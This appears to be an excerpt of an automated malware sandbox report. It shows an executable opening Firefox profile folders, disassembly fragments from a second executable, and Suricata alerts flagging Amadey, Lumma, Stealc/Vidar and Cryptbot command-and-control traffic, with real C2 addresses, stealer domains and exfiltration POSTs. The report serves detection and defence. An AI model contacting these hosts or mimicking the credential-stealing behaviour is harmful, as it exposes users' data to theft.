Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	11_2_0040A960
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edx, ecx	11_2_00409CC0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_0042A060
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	11_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edx, ecx	11_2_0041D074
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edx, ecx	11_2_0041D087
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [esi], cl	11_2_0042D085
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [esi], cl	11_2_0042D085
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	11_2_00426170
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	11_2_0041597D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edi, eax	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov ebx, eax	11_2_00405910
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov ebp, eax	11_2_00405910
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	11_2_00425920
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_004286F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	11_2_00417190
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov ecx, eax	11_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	11_2_0040C274
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [00444284h]	11_2_00425230
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_0043CAC0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	11_2_004292D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edx, ebx	11_2_004292D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	11_2_0042AAD0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [eax], cl	11_2_00415ADC
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then push eax	11_2_0040C36E
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ebx, bx	11_2_0042536C
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	11_2_00402B70
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [ecx], dx	11_2_00427307
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	11_2_00436B20
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	11_2_0043DBD0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_0043CBD6
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	11_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	11_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then jmp eax	11_2_0042B475
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	11_2_00419C10
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_0043CCE0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	11_2_0043DCF0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_0042B4BB
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	11_2_004345F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	11_2_00427653
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [edx], bl	11_2_0040CE55
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_0043CE00
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	11_2_0042A630
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	11_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov byte ptr [esi], al	11_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	11_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	11_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	11_2_004296D8
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	11_2_00415EE0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00421EE0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp al, 2Eh	11_2_004266E7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_004286F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [eax], dx	11_2_00417E82
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	11_2_0043E690
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov edi, eax	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	11_2_0041CEA5
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then add ebx, 03h	11_2_00428F5D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	11_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	11_2_00414F08
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov ecx, edx	11_2_00414F08
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00420717
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then mov word ptr [ecx], dx	11_2_00420717
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	11_2_0042BFD3
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	11_2_0042BFDA
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	11_2_0043DFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49772 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:51658 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:58075 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:51658 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:58075 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49796 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49779
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:61631 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:61631 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:63000 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:63000 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:60470 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:60470 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.5:50135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.5:50135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.5:61035 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.5:61035 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.5:64130 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.5:64130 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49827 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49861 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49878 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.5:53978 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49901 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49902 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49913 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49922 -> 141.8.192.141:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49924 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49931 -> 141.8.192.141:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49949 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49953 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49960 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49970 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49976 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49979 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49994 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50007 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49999 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49998 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:49996 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50012 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50015 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50041 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50032 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50040 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50063 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50066 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50062 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50091 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50092 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50099 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50101 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50103 -> 141.8.192.141:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50105 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:50068 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50098 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50106 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.5:50109 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50113 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50146 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50152 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50290 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50326 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50323
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50317
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50319 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50338 -> 194.87.47.99:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50357 -> 194.87.47.99:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50340 -> 194.87.47.99:80
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.5:56740 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.5:56740 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.5:59627 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.5:59627 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.5:51190 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.5:51190 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50379
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:63149 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:63149 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:54286 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:54286 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:53347 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50381 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:53347 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:52473 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:52473 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:51992 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:51992 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49908 -> 116.203.12.114:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49953 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49953 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49949 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49901 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49901 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.5:49908
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49811 -> 23.37.186.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49913 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49913 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.5:49916
